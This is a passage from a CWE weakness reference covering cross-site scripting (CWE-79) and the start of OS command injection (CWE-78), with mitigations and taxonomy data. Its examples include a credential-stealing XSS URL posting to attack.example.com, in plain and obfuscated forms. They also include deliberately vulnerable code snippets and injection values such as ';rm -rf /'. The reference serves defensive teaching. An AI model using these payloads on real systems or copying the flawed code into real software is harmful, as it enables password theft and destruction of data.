This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending his password to the attacker:

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:

(Result)
 
<div class="header"> Welcome,
<div id="stealPassword">Please Login:
<form name="input" action="attack.example.com/stealPassword.php" method="post">
Username: <input type="text" name="username" />
<br/>
Password: <input type="password" name="password" />
<input type="submit" value="Login" />
</form>
</div>
</div>

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):

(Attack)
 
trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22
stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input
%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php
%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text
%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A
+%3Cinput+type%3D%22password%22+name%3D%22password%22
+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:

(Attack)
 
trustedSite.example.com/welcome.php?username=<script+type="text/javascript">
document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073
\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064
\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067
\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D
\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063
\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F
\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D
\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061
\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068
\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070
\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D
\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061
\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065
\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073
\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075
\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073
\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022
\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E
\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D
\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C
\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Example 2

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

(Bad Code)
Example Language: JSP 
<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.

(Bad Code)
Example Language: ASP.NET 
...
protected System.Web.UI.WebControls.TextBox Login;
protected System.Web.UI.WebControls.Label EmployeeID;
...
EmployeeID.Text = Login.Text;
... (HTML follows) ...
<p><asp:label id="EmployeeID" runat="server" /></p>
...

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Example 3

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

(Bad Code)
Example Language: JSP 
<%
...
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
if (rs != null) {
rs.next();
String name = rs.getString("name");
%>

Employee Name: <%= name %>

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.

(Bad Code)
Example Language: ASP.NET 
protected System.Web.UI.WebControls.Label EmployeeName;
...
string query = "select * from emp where id=" + eid;
sda = new SqlDataAdapter(query, conn);
sda.Fill(dt);
string name = dt.Rows[0]["Name"];
...
EmployeeName.Text = name;

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Example 4

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php

(Bad Code)
Example Language: PHP 
$username = mysql_real_escape_string($username);
$fullName = mysql_real_escape_string($fullName);
$query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ;
mysql_query($query);
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php

(Bad Code)
 
$query = 'Select * From users Where loggedIn=true';
$results = mysql_query($query);
if (!$results) {
exit;
}
//Print list of users to page
echo '<div id="userlist">Currently Active Users:';
while ($row = mysql_fetch_assoc($results)) {
echo '<div class="userNames">'.$row['fullname'].'</div>';
}
echo '</div>';

The attacker can set his name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

+ Observed Examples
ReferenceDescription
Chain: protection mechanism failure allows XSS
Chain: only checks "javascript:" tag
Chain: only removes SCRIPT tags, enabling XSS
Reflected XSS using the PATH_INFO in a URL
Reflected XSS not properly handled when generating an error message
Reflected XSS sent through email message.
Stored XSS in a security product.
Stored XSS using a wiki page.
Stored XSS in a guestbook application.
Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.
Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:

  • HTML body

  • Element attributes (such as src="XYZ")

  • URIs

  • JavaScript sections

  • Cascading Style Sheets and style property

etc. Note that HTML Entity Encoding is only appropriate for the HTML body.

Consult the XSS Prevention Cheat Sheet [R.79.16] for more details on the types of encoding and escaping that are needed.

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Effectiveness: Limited

This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Strategy: Parameterization

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

Strategy: Output Encoding

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.

The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.

Phase: Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Phase: Implementation

Strategy: Identify and Reduce Attack Surface

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Effectiveness: Defense in Depth

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When dynamically constructing web pages, use stringent whitelists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.

Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.

Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

+ Background Details

Same Origin Policy

The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.

Domain

The Domain of a website when referring to XSS is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)Named Chain(s) this relationship pertains toChain(s)
ChildOfWeakness ClassWeakness Class74Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory442Web Problems
Development Concepts699
ChildOfCategoryCategory712OWASP Top Ten 2007 Category A1 - Cross Site Scripting (XSS)
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory722OWASP Top Ten 2004 Category A1 - Unvalidated Input
Weaknesses in OWASP Top Ten (2004)711
ChildOfCategoryCategory725OWASP Top Ten 2004 Category A4 - Cross-Site Scripting (XSS) Flaws
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8012010 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory811OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory8642011 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory931OWASP Top Ten 2013 Category A3 - Cross-Site Scripting (XSS)
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory990SFP Secondary Cluster: Tainted Input to Command
Software Fault Pattern (SFP) Clusters (primary)888
ChildOfCategoryCategory1005Input Validation and Representation
Seven Pernicious Kingdoms (primary)700
CanPrecedeWeakness BaseWeakness Base494Download of Code Without Integrity Check
Research Concepts1000
PeerOfCompound Element: CompositeCompound Element: Composite352Cross-Site Request Forgery (CSRF)
Research Concepts1000
ParentOfWeakness VariantWeakness Variant80Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant81Improper Neutralization of Script in an Error Message Web Page
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant83Improper Neutralization of Script in Attributes in a Web Page
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant84Improper Neutralization of Encoded URI Schemes in a Web Page
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant85Doubled Character XSS Manipulations
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant86Improper Neutralization of Invalid Characters in Identifiers in Web Pages
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant87Improper Neutralization of Alternate XSS Syntax
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base113Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
Research Concepts1000
CanFollowWeakness BaseWeakness Base184Incomplete Blacklist
Research Concepts1000
Incomplete Blacklist to Cross-Site Scripting692
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERCross-site scripting (XSS)
7 Pernicious KingdomsCross-site Scripting
CLASPCross-site scripting
OWASP Top Ten 2007A1ExactCross Site Scripting (XSS)
OWASP Top Ten 2004A1CWE More SpecificUnvalidated Input
OWASP Top Ten 2004A4ExactCross-Site Scripting (XSS) Flaws
WASC8Cross-site Scripting
Software Fault PatternsSFP24Tainted input to command
+ References
[R.79.1] [REF-15] Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager and Seth Fogie. "XSS Attacks". Syngress. 2007.
[R.79.2] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 31. McGraw-Hill. 2010.
[R.79.3] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 3: Web-Client Related Vulnerabilities (XSS)." Page 63. McGraw-Hill. 2010.
[R.79.4] "Cross-site scripting". Wikipedia. 2008-08-26. <http://en.wikipedia.org/wiki/Cross-site_scripting>.
[R.79.5] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 13, "Web-Specific Input Issues" Page 413. 2nd Edition. Microsoft. 2002.
[R.79.6] [REF-14] RSnake. "XSS (Cross Site Scripting) Cheat Sheet". <http://ha.ckers.org/xss.html>.
[R.79.7] Microsoft. "Mitigating Cross-site Scripting With HTTP-only Cookies". <http://msdn.microsoft.com/en-us/library/ms533046.aspx>.
[R.79.8] Mark Curphey, Microsoft. "Anti-XSS 3.0 Beta and CAT.NET Community Technology Preview now Live!". <http://blogs.msdn.com/cisg/archive/2008/12/15/anti-xss-3-0-beta-and-cat-net-community-technology-preview-now-live.aspx>.
[R.79.9] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.79.10] Ivan Ristic. "XSS Defense HOWTO". <http://blog.modsecurity.org/2008/07/do-you-know-how.html>.
[R.79.11] OWASP. "Web Application Firewall". <http://www.owasp.org/index.php/Web_Application_Firewall>.
[R.79.12] Web Application Security Consortium. "Web Application Firewall Evaluation Criteria". <http://www.webappsec.org/projects/wafec/v1/wasc-wafec-v1.0.html>.
[R.79.13] RSnake. "Firefox Implements httpOnly And is Vulnerable to XMLHTTPRequest". 2007-07-19.
[R.79.14] "XMLHttpRequest allows reading HTTPOnly cookies". Mozilla. <https://bugzilla.mozilla.org/show_bug.cgi?id=380418>.
[R.79.15] "Apache Wicket". <http://wicket.apache.org/>.
[R.79.16] [REF-16] OWASP. "XSS (Cross Site Scripting) Prevention Cheat Sheet". <http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet>.
[R.79.17] [REF-20] OWASP. "DOM based XSS Prevention Cheat Sheet". <http://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet>.
[R.79.18] Jason Lam. "Top 25 series - Rank 1 - Cross Site Scripting". SANS Software Security Institute. 2010-02-22. <http://blogs.sans.org/appsecstreetfighter/2010/02/22/top-25-series-rank-1-cross-site-scripting/>.
[R.79.19] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 17, "Cross Site Scripting", Page 1071.. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities
2009-01-12CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Name
2009-07-27CWE Content TeamMITREInternal
updated Description
2009-10-29CWE Content TeamMITREInternal
updated Observed_Examples, Relationships
2009-12-28CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2010-04-05CWE Content TeamMITREInternal
updated Description, Potential_Mitigations, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples, References
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Cross-site Scripting (XSS)
2009-01-12Failure to Sanitize Directives in a Web Page (aka 'Cross-site scripting' (XSS))
2009-05-27Failure to Preserve Web Page Structure (aka 'Cross-site Scripting')
2010-06-21Failure to Preserve Web Page Structure ('Cross-site Scripting')

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Weakness ID: 78
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Extended Description

This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.

There are at least two subtypes of OS command injection:

  1. The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system("nslookup [HOSTNAME]") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing.

  2. The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use "exec([COMMAND])" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line.

From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input.

+ Alternate Terms
Shell injection
Shell metacharacters
+ Terminology Notes

The "OS command injection" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an "-exec" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX "find" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Confidentiality
Integrity
Availability
Non-Repudiation

Technical Impact: Execute unauthorized code or commands; DoS: crash / exit / restart; Read files or directories; Modify files or directories; Read application data; Modify application data; Hide activities

Attackers could execute unauthorized commands, which could then be used to disable the software, or read and modify data for which the attacker does not have permissions to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application's owner.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.

Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis.

This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Effectiveness: Moderate

Manual Static Analysis

Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.

Effectiveness: High

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection.

(Bad Code)
Example Language: PHP 
$userName = $_POST["user"];
$command = 'ls -l /home/' . $userName;
system($command);

The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as:

(Attack)
 
;rm -rf /

Which would result in $command being:

(Result)
 
ls -l /home/;rm -rf /

Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system.

Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks.

Example 2

This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection.

(Bad Code)
Example Language: Perl 
use CGI qw(:standard);
$name = param('name');
$nslookup = "/path/to/nslookup";
print header;
if (open($fh, "$nslookup $name|")) {
while (<$fh>) {
print escapeHTML($_);
print "<br>\n";
}
close($fh);
}

Suppose an attacker provides a domain name like this:

(Attack)
 
cwe.mitre.org%20%3B%20/bin/ls%20-l

The "%3B" sequence decodes to the ";" character, and the %20 decodes to a space. The open() statement would then process a string like this:

(Result)
 
/path/to/nslookup cwe.mitre.org ; /bin/ls -l

As a result, the attacker executes the "/bin/ls -l" command and gets a list of all the files in the program's working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server.

Example 3

The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection.

(Bad Code)
Example Language: Java 
String script = System.getProperty("SCRIPTNAME");
if (script != null)
System.exec(script);

If an attacker has control over this property, then they could modify the property to point to a dangerous program.

Example 4

